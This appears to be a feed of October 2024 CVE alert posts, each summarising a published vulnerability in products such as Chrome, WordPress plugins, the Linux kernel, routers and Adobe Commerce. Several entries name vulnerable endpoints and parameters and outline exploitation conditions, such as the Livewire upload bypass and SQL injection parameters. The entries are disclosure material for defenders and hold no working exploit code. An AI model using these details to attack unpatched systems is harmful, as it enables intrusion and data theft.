🚨 CVE-2023-39389Vulnerability of input parameters being not strictly verified in the PMS module. Successful exploitation of this vulnerability may cause home screen unavailability.🎖@cveNotify |
|
| 2024-10-10 15:37:40 |
🚨 CVE-2023-39381Input verification vulnerability in the storage module. Successful exploitation of this vulnerability may cause the device to restart.🎖@cveNotify |
|
| 2024-10-10 15:37:36 |
🚨 CVE-2023-39380Permission control vulnerability in the audio module. Successful exploitation of this vulnerability may cause audio devices to perform abnormally.🎖@cveNotify |
|
| 2024-10-10 15:37:35 |
🚨 CVE-2023-1532Out of bounds read in GPU Video in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-10-10 15:37:34 |
🚨 CVE-2023-1531Use after free in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-10-10 15:07:44 |
🚨 CVE-2024-25360A hidden interface in Motorola CX2L Router firmware v1.0.1 leaks information regarding the SystemWizardStatus component via sending a crafted request to device_web_ip.🎖@cveNotify |
|
| 2024-10-10 14:07:41 |
🚨 CVE-2024-38259Microsoft Management Console Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-10-10 14:07:40 |
🚨 CVE-2024-1439Inadequate access control in Moodle LMS. This vulnerability could allow a local user with a student role to create arbitrary events intended for users with higher roles. It could also allow the attacker to add events to the calendar of all users without their prior consent.🎖@cveNotify |
|
| 2024-10-10 14:07:39 |
🚨 CVE-2024-24884Cross-Site Request Forgery (CSRF) vulnerability in ARI Soft Contact Form 7 Connector.This issue affects Contact Form 7 Connector: from n/a through 1.2.2.🎖@cveNotify |
|
| 2024-10-10 14:07:38 |
🚨 CVE-2024-21490This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:**This package is EOL and will not receive any updates to address this issue. Users should migrate to [@angular/core](https://www.npmjs.com/package/@angular/core).🎖@cveNotify |
|
| 2024-10-10 13:37:31 |
🚨 CVE-2024-35202Bitcoin Core before 25.0 allows remote attackers to cause a denial of service (blocktxn message-handling assertion and node exit) by including transactions in a blocktxn message that are not committed to in a block's merkle root. FillBlock can be called twice for one PartiallyDownloadedBlock instance.🎖@cveNotify |
|
| 2024-10-10 13:37:30 |
🚨 CVE-2024-9549A vulnerability was found in D-Link DIR-605L 2.13B01 BETA and classified as critical. This issue affects the function formEasySetupWizard/formEasySetupWizard2 of the file /goform/formEasySetupWizard. The manipulation of the argument curTime leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-10 13:37:29 |
🚨 CVE-2024-46590Draytek Vigor 3910 v4.3.2.6 was discovered to contain a buffer overflow in the ssidencrypt%d parameter at v2x00.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2024-10-10 13:37:26 |
🚨 CVE-2024-27861The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15. An application may be able to read restricted memory.🎖@cveNotify |
|
| 2024-10-10 13:37:25 |
🚨 CVE-2024-24875Cross-Site Request Forgery (CSRF) vulnerability in Yannick Lefebvre Link Library.This issue affects Link Library: from n/a through 7.5.13.🎖@cveNotify |
|
| 2024-10-10 13:37:24 |
🚨 CVE-2023-46615Deserialization of Untrusted Data vulnerability in Kalli Dan. KD Coming Soon.This issue affects KD Coming Soon: from n/a through 1.7.🎖@cveNotify |
|
| 2024-10-10 13:07:34 |
🚨 CVE-2024-25705There is a cross site scripting vulnerability in the Esri Portal for ArcGIS Experience Builder 11.1 and below on Windows and Linux that allows a remote, unauthenticated attacker to create a crafted link which when clicked could potentially execute arbitrary JavaScript code in the victim’s browser. The privileges required to execute this attack are low.🎖@cveNotify |
|
| 2024-10-10 13:07:33 |
🚨 CVE-2023-51370Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NinjaTeam WP Chat App allows Stored XSS.This issue affects WP Chat App: from n/a through 3.4.4.🎖@cveNotify |
|
| 2024-10-10 12:37:29 |
🚨 CVE-2024-26876In the Linux kernel, the following vulnerability has been resolved:drm/bridge: adv7511: fix crash on irq during probeMoved IRQ registration down to end of adv7511_probe().If an IRQ already is pending during adv7511_probe(before adv7511_cec_init) then cec_received_msg_tscould crash using uninitialized data: Unable to handle kernel read from unreadable memory at virtual address 00000000000003d5 Internal error: Oops: 96000004 [#1] PREEMPT_RT SMP Call trace: cec_received_msg_ts+0x48/0x990 [cec] adv7511_cec_irq_process+0x1cc/0x308 [adv7511] adv7511_irq_process+0xd8/0x120 [adv7511] adv7511_irq_handler+0x1c/0x30 [adv7511] irq_thread_fn+0x30/0xa0 irq_thread+0x14c/0x238 kthread+0x190/0x1a8🎖@cveNotify |
|
| 2024-10-10 12:37:28 |
🚨 CVE-2024-26596In the Linux kernel, the following vulnerability has been resolved:net: dsa: fix netdev_priv() dereference before check on non-DSA netdevice eventsAfter the blamed commit, we started doing this dereference for everyNETDEV_CHANGEUPPER and NETDEV_PRECHANGEUPPER event in the system.static inline struct dsa_port *dsa_user_to_port(const struct net_device *dev){ struct dsa_user_priv *p = netdev_priv(dev); return p->dp;}Which is obviously bogus, because not all net_devices have a netdev_priv()of type struct dsa_user_priv. But struct dsa_user_priv is fairly small,and p->dp means dereferencing 8 bytes starting with offset 16. Mostdrivers allocate that much private memory anyway, making our access notfault, and we discard the bogus data quickly afterwards, so this wasn'tcaught.But the dummy interface is somewhat special in that it callsalloc_netdev() with a priv size of 0. So every netdev_priv() dereferenceis invalid, and we get this when we emit a NETDEV_PRECHANGEUPPER eventwith a VLAN as its new upper:$ ip link add dummy1 type dummy$ ip link add link dummy1 name dummy1.100 type vlan id 100[ 43.309174] ==================================================================[ 43.316456] BUG: KASAN: slab-out-of-bounds in dsa_user_prechangeupper+0x30/0xe8[ 43.323835] Read of size 8 at addr ffff3f86481d2990 by task ip/374[ 43.330058][ 43.342436] Call trace:[ 43.366542] dsa_user_prechangeupper+0x30/0xe8[ 43.371024] dsa_user_netdevice_event+0xb38/0xee8[ 43.375768] notifier_call_chain+0xa4/0x210[ 43.379985] raw_notifier_call_chain+0x24/0x38[ 43.384464] __netdev_upper_dev_link+0x3ec/0x5d8[ 43.389120] netdev_upper_dev_link+0x70/0xa8[ 43.393424] register_vlan_dev+0x1bc/0x310[ 43.397554] vlan_newlink+0x210/0x248[ 43.401247] rtnl_newlink+0x9fc/0xe30[ 43.404942] rtnetlink_rcv_msg+0x378/0x580Avoid the kernel oops by dereferencing after the type check, as customary.🎖@cveNotify |
|
| 2024-10-10 12:07:24 |
🚨 CVE-2024-29176Dell PowerProtect DD, versions prior to 8.0, LTS 7.13.1.0, LTS 7.10.1.30, LTS 7.7.5.40 contain a buffer overflow vulnerability. A remote low privileged attacker could potentially exploit this vulnerability, leading to an application crash or execution of arbitrary code on the vulnerable application's underlying operating system with privileges of the vulnerable application.🎖@cveNotify |
|
| 2024-10-10 11:37:25 |
🚨 CVE-2024-9201The SEUR plugin, in its versions prior to 2.5.11, is vulnerable to time-based SQL injection through the use of the ‘id_order’ parameter of the ‘/modules/seur/ajax/saveCodFee.php’ endpoint.🎖@cveNotify |
|
| 2024-10-10 11:37:24 |
🚨 CVE-2024-48902In JetBrains YouTrack before 2024.3.46677 improper access control allowed users with project update permission to delete applications via API🎖@cveNotify |
|
| 2024-10-10 11:07:24 |
🚨 CVE-2024-4639OnCell G3470A-LTE Series firmware versions v1.7.7 and prior have been identified as vulnerable due to a lack of neutralized inputs in IPSec configuration. An attacker could modify the intended commands sent to target functions, which could cause malicious users to execute unauthorized commands.🎖@cveNotify |
|
| 2024-10-10 10:37:32 |
🚨 CVE-2024-45119Adobe Commerce versions 2.4.7-p2, 2.4.6-p7, 2.4.5-p9, 2.4.4-p10 and earlier are affected by a Server-Side Request Forgery (SSRF) vulnerability that could lead to arbitrary file system read. A low-privilege authenticated attacker can force the application to make arbitrary requests via injection of arbitrary URLs and have a low impact on both confidentiality and integrity. Exploitation of this issue does not require user interaction and scope is changed.🎖@cveNotify |
|
| 2024-10-10 10:37:26 |
🚨 CVE-2024-45118Adobe Commerce versions 2.4.7-p2, 2.4.6-p7, 2.4.5-p9, 2.4.4-p10 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and have high impact on integrity. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-10-10 10:37:25 |
🚨 CVE-2024-45115Adobe Commerce versions 2.4.7-p2, 2.4.6-p7, 2.4.5-p9, 2.4.4-p10 and earlier are affected by an Improper Authentication vulnerability that could result in privilege escalation. An attacker could exploit this vulnerability to gain unauthorized access or elevated privileges within the application. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-10-10 10:37:24 |
🚨 CVE-2024-38348CodeProjects Health Care hospital Management System v1.0 was discovered to contain a SQL injection vulnerability in the Staff Info module via the searvalu parameter.🎖@cveNotify |
|
| 2024-10-10 09:37:32 |
🚨 CVE-2024-22068Improper Privilege Management vulnerability in ZTE ZXR10 1800-2S series ,ZXR10 2800-4,ZXR10 3800-8,ZXR10 160 series on 64 bit allows Functionality Bypass.This issue affects ZXR10 1800-2S series ,ZXR10 2800-4,ZXR10 3800-8,ZXR10 160 series: V4.00.10 and earlier.🎖@cveNotify |
|
| 2024-10-10 08:37:32 |
🚨 CVE-2024-9802The conformance validation endpoint is public so everybody can verify the conformance of onboarded services. The response could contain specific information about the service, including available endpoints, and swagger. It could advise about the running version of a service to an attacker. The attacker could also check if a service is running.🎖@cveNotify |
|
| 2024-10-10 08:37:29 |
🚨 CVE-2024-9798The health endpoint is public so everybody can see a list of all services. It is potentially valuable information for attackers.🎖@cveNotify |
|
| 2024-10-10 08:37:28 |
🚨 CVE-2024-6747Information leakage in mknotifyd in Checkmk before 2.3.0p18, 2.2.0p36, 2.1.0p49 and in 2.0.0p39 (EOL) allows attacker to get potentially sensitive data🎖@cveNotify |
|
| 2024-10-10 08:37:27 |
🚨 CVE-2024-38817VMware NSX contains a command injection vulnerability. A malicious actor with access to the NSX Edge CLI terminal may be able to craft malicious payloads to execute arbitrary commands on the operating system as root.🎖@cveNotify |
|
| 2024-10-10 07:37:25 |
🚨 CVE-2024-9780ITS dissector crash in Wireshark 4.4.0 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2024-10-10 07:37:24 |
🚨 CVE-2024-3656A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.🎖@cveNotify |
|
| 2024-10-10 06:37:24 |
🚨 CVE-2024-9156The TI WooCommerce Wishlist WordPress plugin through 2.8.2 is vulnerable to SQL Injection due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-10-10 03:37:26 |
🚨 CVE-2024-9520The UserPlus plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 2.0. This makes it possible for authenticated attackers with subscriber-level permissions or above, to add, modify, or delete user meta and plugin options.🎖@cveNotify |
|
| 2024-10-10 03:37:25 |
🚨 CVE-2024-9022The TS Poll – Survey, Versus Poll, Image Poll, Video Poll plugin for WordPress is vulnerable to SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-10-10 03:37:24 |
🚨 CVE-2024-8477The Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.87. This is due to missing or incorrect nonce validation on the Init() function. This makes it possible for unauthenticated attackers to log out of a Brevo connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-10 02:37:32 |
🚨 CVE-2024-8729The Easy Social Share Buttons plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-10 02:37:25 |
🚨 CVE-2024-48957execute_filter_audio in archive_read_support_format_rar.c in libarchive before 3.7.5 allows out-of-bounds access via a crafted archive file because src can move beyond dst.🎖@cveNotify |
|
| 2024-10-10 02:37:24 |
🚨 CVE-2024-28125FitNesse all releases allows a remote authenticated attacker to execute arbitrary OS commands. Note: A contributor of FitNesse has claimed that this is not a vulnerability but a product specification and this is currently under further investigation.🎖@cveNotify |
|
| 2024-10-10 01:37:26 |
🚨 CVE-2024-48949The verify function in lib/elliptic/eddsa/index.js in the Elliptic package before 6.5.6 for Node.js omits "sig.S().gte(sig.eddsa.curve.n) || sig.S().isNeg()" validation.🎖@cveNotify |
|
| 2024-10-10 01:07:25 |
🚨 CVE-2024-23113A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows attacker to execute unauthorized code or commands via specially crafted packets.🎖@cveNotify |
|
| 2024-10-10 00:37:25 |
🚨 CVE-2024-48941The Syracom Secure Login (2FA) plugin for Jira, Confluence, and Bitbucket through 3.1.4.5 allows remote attackers to bypass 2FA by interacting with the /rest endpoint of Jira, Confluence, or Bitbucket. In the default configuration, /rest is allowlisted.🎖@cveNotify |
|
| 2024-10-10 00:37:24 |
🚨 CVE-2024-47823Livewire is a full-stack framework for Laravel that allows for dynamic UI components without leaving PHP. In livewire/livewire prior to `2.12.7` and `v3.5.2`, the file extension of an uploaded file is guessed based on the MIME type. As a result, the actual file extension from the file name is not validated. An attacker can therefore bypass the validation by uploading a file with a valid MIME type (e.g., `image/png`) and a “.php” file extension. If the following criteria are met, the attacker can carry out an RCE attack: 1. Filename is composed of the original file name using `$file->getClientOriginalName()`. 2. Files stored directly on your server in a public storage disk. 3. Webserver is configured to execute “.php” files. This issue has been addressed in release versions `2.12.7` and `3.5.2`. All users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-10-09 23:37:32 |
🚨 CVE-2024-48933A cross-site scripting (XSS) vulnerability in LemonLDAP::NG before 2.19.3 allows remote attackers to inject arbitrary web script or HTML into the login page via a username if userControl has been set to a non-default value that allows special HTML characters.🎖@cveNotify |
|
| 2024-10-09 23:37:25 |
🚨 CVE-2024-9464An OS command injection vulnerability in Palo Alto Networks Expedition allows an authenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.🎖@cveNotify |
|
| 2024-10-09 23:37:24 |
🚨 CVE-2024-9463An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.🎖@cveNotify |
|
| 2024-10-09 22:37:24 |
🚨 CVE-2023-37154check_by_ssh in Nagios nagios-plugins 2.4.5 allows arbitrary command execution via ProxyCommand, LocalCommand, and PermitLocalCommand with \${IFS}. This has been categorized both as fixed in e8810de, and as intended behavior.🎖@cveNotify |
|
| 2024-10-09 21:37:32 |
🚨 CVE-2024-45160Incorrect credential validation in LemonLDAP::NG 2.18.x and 2.19.x before 2.19.2 allows attackers to bypass OAuth2 client authentication via an empty client_password parameter (client secret).🎖@cveNotify |
|
| 2024-10-09 21:37:25 |
🚨 CVE-2023-39292A SQL Injection vulnerability has been identified in the MiVoice Office 400 SMB Controller through 1.2.5.23 which could allow a malicious actor to access sensitive information and execute arbitrary database and management operations.🎖@cveNotify |
|
| 2024-10-09 21:37:24 |
🚨 CVE-2023-1529Out of bounds memory access in WebHID in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a malicious HID device. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-10-09 20:37:32 |
🚨 CVE-2023-39397Input parameter verification vulnerability in the communication system. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2024-10-09 20:37:26 |
🚨 CVE-2023-39395Mismatch vulnerability in the serialization process in the communication system. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2024-10-09 20:37:25 |
🚨 CVE-2023-1528Use after free in Passwords in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-10-09 20:37:24 |
🚨 CVE-2021-41307Affected versions of Atlassian Jira Server and Data Center allow unauthenticated remote attackers to view the names of private projects and private filters via an Insecure Direct Object References (IDOR) vulnerability in the Workload Pie Chart Gadget. The affected versions are before version 8.13.12, and from version 8.14.0 before 8.20.0.🎖@cveNotify |
|
| 2024-10-09 19:37:37 |
🚨 CVE-2024-47832ssoready is a single sign on provider implemented via docker. Affected versions are vulnerable to XML signature bypass attacks. An attacker can carry out signature bypass if you have access to certain IDP-signed messages. The underlying mechanism exploits differential behavior between XML parsers. Users of https://ssoready.com, the public hosted instance of SSOReady, are unaffected. We advise folks who self-host SSOReady to upgrade to 7f92a06 or later. Do so by updating your SSOReady Docker images from sha-... to sha-7f92a06. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-10-09 19:37:31 |
🚨 CVE-2024-47828ampache is a web based audio/video streaming application and file manager. A CSRF attack can be performed in order to delete objects (Playlist, smartlist etc.). Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a Web application against which they are currently authenticated. This vulnerability can be exploited by creating a malicious script with an arbitrary playlist ID belonging to another user. When the user submits the request, their playlist will be deleted. Any User with active sessions who are tricked into submitting a malicious request are impacted, as their playlists or other objects could be deleted without their consent.🎖@cveNotify |
|
| 2024-10-09 19:37:30 |
🚨 CVE-2024-47812ImportDump is an extension for mediawiki designed to automate user import requests. Anyone who can edit the interface strings of a wiki (typically administrators and interface admins) can embed XSS payloads in the messages for dates, and thus XSS anyone who views Special:RequestImportQueue. This issue has been patched in commit `d054b95` and all users are advised to apply this commit to their branch. Users unable to upgrade may either Prevent access to Special:RequestImportQueue on all wikis, except for the global wiki; and If an interface administrator (or equivalent) level protection is available (which is not provided by default) on the global wiki, protect the affected messages up to that level. This causes the XSS to be virtually useless as users with those rights can already edit Javascript pages. Or Prevent access to Special:RequestImportQueue altogether.🎖@cveNotify |
|
| 2024-10-09 19:37:29 |
🚨 CVE-2024-3656A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.🎖@cveNotify |
|
| 2024-10-09 19:37:26 |
🚨 CVE-2024-46316DrayTek Vigor3900 v1.5.1.6 was discovered to contain a command injection vulnerability via the sub_2C920 function at /cgi-bin/mainfunction.cgi. This vulnerability allows attackers to execute arbitrary commands via supplying a crafted HTTP message.🎖@cveNotify |
|
| 2024-10-09 19:37:25 |
🚨 CVE-2023-21134In onCreate of ManagePermissionsActivity.java, there is a possible way to bypass factory reset protections due to a missing permission check. This could lead to local escalation of privilege with physical access to a device that's been factory reset with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-09 19:37:24 |
🚨 CVE-2021-41306Affected versions of Atlassian Jira Server and Data Center allow anonymous remote attackers to view private project and filter names via an Insecure Direct Object References (IDOR) vulnerability in the Average Time in Status Gadget. The affected versions are before version 8.13.12, and from version 8.14.0 before 8.20.0.🎖@cveNotify |
|
| 2024-10-09 19:07:24 |
🚨 CVE-2024-37624Xinhu RockOA v2.6.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the /chajian/inputChajian.php. component.🎖@cveNotify |
|
| 2024-10-09 18:37:32 |
🚨 CVE-2024-47763Wasmtime is an open source runtime for WebAssembly. Wasmtime's implementation of WebAssembly tail calls combined with stack traces can result in a runtime crash in certain WebAssembly modules. The runtime crash may be undefined behavior if Wasmtime was compiled with Rust 1.80 or prior. The runtime crash is a deterministic process abort when Wasmtime is compiled with Rust 1.81 and later. WebAssembly tail calls are a proposal which relatively recently reached stage 4 in the standardization process. Wasmtime first enabled support for tail calls by default in Wasmtime 21.0.0, although that release contained a bug where it was only on-by-default for some configurations. In Wasmtime 22.0.0 tail calls were enabled by default for all configurations. The specific crash happens when an exported function in a WebAssembly module (or component) performs a `return_call` (or `return_call_indirect` or `return_call_ref`) to an imported host function which captures a stack trace (for example, the host function raises a trap). In this situation, the stack-walking code previously assumed there was always at least one WebAssembly frame on the stack but with tail calls that is no longer true. With the tail-call proposal it's possible to have an entry trampoline appear as if it directly called the exit trampoline. This situation triggers an internal assert in the stack-walking code which raises a Rust `panic!()`. When Wasmtime is compiled with Rust versions 1.80 and prior this means that an `extern "C"` function in Rust is raising a `panic!()`. This is technically undefined behavior and typically manifests as a process abort when the unwinder fails to unwind Cranelift-generated frames. When Wasmtime is compiled with Rust versions 1.81 and later this panic becomes a deterministic process abort. Overall the impact of this issue is that this is a denial-of-service vector where a malicious WebAssembly module or component can cause the host to crash. There is no other impact at this time other than availability of a service as the result of the crash is always a crash and no more. This issue was discovered by routine fuzzing performed by the Wasmtime project via Google's OSS-Fuzz infrastructure. We have no evidence that it has ever been exploited by an attacker in the wild. All versions of Wasmtime which have tail calls enabled by default have been patched: * 21.0.x - patched in 21.0.2 * 22.0.x - patched in 22.0.1 * 23.0.x - patched in 23.0.3 * 24.0.x - patched in 24.0.1 * 25.0.x - patched in 25.0.2. Wasmtime versions from 12.0.x (the first release with experimental tail call support) to 20.0.x (the last release with tail-calls off-by-default) have support for tail calls but the support is disabled by default. These versions are not affected in their default configurations, but users who explicitly enabled tail call support will need to either disable tail call support or upgrade to a patched version of Wasmtime. The main workaround for this issue is to disable tail support for tail calls in Wasmtime, for example with `Config::wasm_tail_call(false)`. Users are otherwise encouraged to upgrade to patched versions.🎖@cveNotify |
|
| 2024-10-09 18:37:25 |
🚨 CVE-2023-31065Insufficient Session Expiration vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.6.0. An old session can be used by an attacker even after the user has been deleted or the password has been changed.Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 https://github.com/apache/inlong/pull/7836 , https://github.com/apache/inlong/pull/7884 https://github.com/apache/inlong/pull/7884 to solve it.🎖@cveNotify |
|
| 2024-10-09 18:37:24 |
🚨 CVE-2023-31454Incorrect Permission Assignment for Critical Resource Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.2.0 through 1.6.0. The attacker can bind any cluster, even if he is not the cluster owner. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/7947 https://github.com/apache/inlong/pull/7947🎖@cveNotify |
|
| 2024-10-09 17:07:30 |
🚨 CVE-2024-42415An integer overflow vulnerability exists in the Compound Document Binary File format parser of v1.14.52 of the GNOME Project G Structured File Library (libgsf). A specially crafted file can result in an integer overflow that allows for a heap-based buffer overflow when processing the sector allocation table. This can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-10-09 17:07:29 |
🚨 CVE-2024-36474An integer overflow vulnerability exists in the Compound Document Binary File format parser of the GNOME Project G Structured File Library (libgsf) version v1.14.52. A specially crafted file can result in an integer overflow when processing the directory from the file that allows for an out-of-bounds index to be used when reading and writing to an array. This can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-10-09 17:07:26 |
🚨 CVE-2024-20470A vulnerability in the web-based management interface of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an authenticated, remote attacker to execute arbitrary code on an affected device. In order to exploit this vulnerability, the attacker must have valid admin credentials.This vulnerability exists because the web-based management interface does not sufficiently validate user-supplied input. An attacker could exploit this vulnerability by sending crafted HTTP input to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system.🎖@cveNotify |
|
| 2024-10-09 17:07:25 |
🚨 CVE-2024-5179The Cowidgets – Elementor Addons plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.1 via the 'item_style' and 'style' parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-10-09 17:07:24 |
🚨 CVE-2024-35649Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Pdfcrowd Save as PDF plugin by Pdfcrowd allows Stored XSS.This issue affects Save as PDF plugin by Pdfcrowd: from n/a through 3.2.3.🎖@cveNotify |
|
| 2024-10-09 16:37:38 |
🚨 CVE-2024-252853DSecure 2.0 allows form action hijacking via threeDsMethod.jsp?threeDSMethodData= or the threeDSMethodNotificationURL parameter. The destination web site for a form submission can be modified.🎖@cveNotify |
|
| 2024-10-09 16:37:37 |
🚨 CVE-2024-43573Windows MSHTML Platform Spoofing Vulnerability🎖@cveNotify |
|
| 2024-10-09 16:37:36 |
🚨 CVE-2024-43572Microsoft Management Console Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-10-09 16:37:32 |
🚨 CVE-2024-9021In the process of testing the Relevanssi WordPress plugin before 4.23.1, a vulnerability was found that allows you to implement Stored XSS on behalf of the Contributor+ by embedding malicious script, which entails account takeover backdoor🎖@cveNotify |
|
| 2024-10-09 16:37:31 |
🚨 CVE-2024-5482A Server-Side Request Forgery (SSRF) vulnerability exists in the 'add_webpage' endpoint of the parisneo/lollms-webui application, affecting the latest version. The vulnerability arises because the application does not adequately validate URLs entered by users, allowing them to input arbitrary URLs, including those that target internal resources such as 'localhost' or '127.0.0.1'. This flaw enables attackers to make unauthorized requests to internal or external systems, potentially leading to access to sensitive data, service disruption, network integrity compromise, business logic manipulation, and abuse of third-party resources. The issue is critical and requires immediate attention to maintain the application's security and integrity.🎖@cveNotify |
|
| 2024-10-09 16:37:30 |
🚨 CVE-2023-6501The Splashscreen WordPress plugin through 0.20 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-10-09 16:37:26 |
🚨 CVE-2023-48831A lack of rate limiting in pjActionAJaxSend in Availability Booking Calendar 5.0 allows attackers to cause resource exhaustion.🎖@cveNotify |
|
| 2024-10-09 16:37:25 |
🚨 CVE-2023-21272In readFrom of Uri.java, there is a possible bad URI permission grant due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-09 16:07:41 |
🚨 CVE-2024-46836In the Linux kernel, the following vulnerability has been resolved:usb: gadget: aspeed_udc: validate endpoint index for ast udcWe should verify the bound of the array to assure that hostmay not manipulate the index to point past endpoint array.Found by static analysis.🎖@cveNotify |
|
| 2024-10-09 16:07:37 |
🚨 CVE-2024-46832In the Linux kernel, the following vulnerability has been resolved:MIPS: cevt-r4k: Don't call get_c0_compare_int if timer irq is installedThis avoids warning:[ 0.118053] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:283Caused by get_c0_compare_int on secondary CPU.We also skipped saving IRQ number to struct clock_event_device *cd asit's never used by clockevent core, as per comments it's only meantfor "non CPU local devices".🎖@cveNotify |
|
| 2024-10-09 16:07:36 |
🚨 CVE-2023-6591The Popup Box WordPress plugin before 20.9.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed🎖@cveNotify |
|
| 2024-10-09 15:37:43 |
🚨 CVE-2024-45394Authenticator is a browser extension that generates two-step verification codes. In versions 7.0.0 and below, encryption keys for user data were stored encrypted at-rest using only AES-256 and the EVP_BytesToKey KDF. Therefore, attackers with a copy of a user's data are able to brute-force the user's encryption key. Users on version 8.0.0 and above are automatically migrated away from the weak encoding on first login. Users should destroy encrypted backups made with versions prior to 8.0.0.🎖@cveNotify |
|
| 2024-10-09 15:37:42 |
🚨 CVE-2024-37156The SuluFormBundle adds support for creating dynamic forms in Sulu Admin. The TokenController get parameter formName is not sanitized in the returned input field which leads to XSS. This vulnerability is fixed in 2.5.3.🎖@cveNotify |
|
| 2024-10-09 15:37:38 |
🚨 CVE-2024-24697Untrusted search path in some Zoom 32 bit Windows clients may allow an authenticated user to conduct an escalation of privilege via local access.🎖@cveNotify |
|
| 2024-10-09 15:37:37 |
🚨 CVE-2024-0566The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.🎖@cveNotify |
|
| 2024-10-09 15:37:36 |
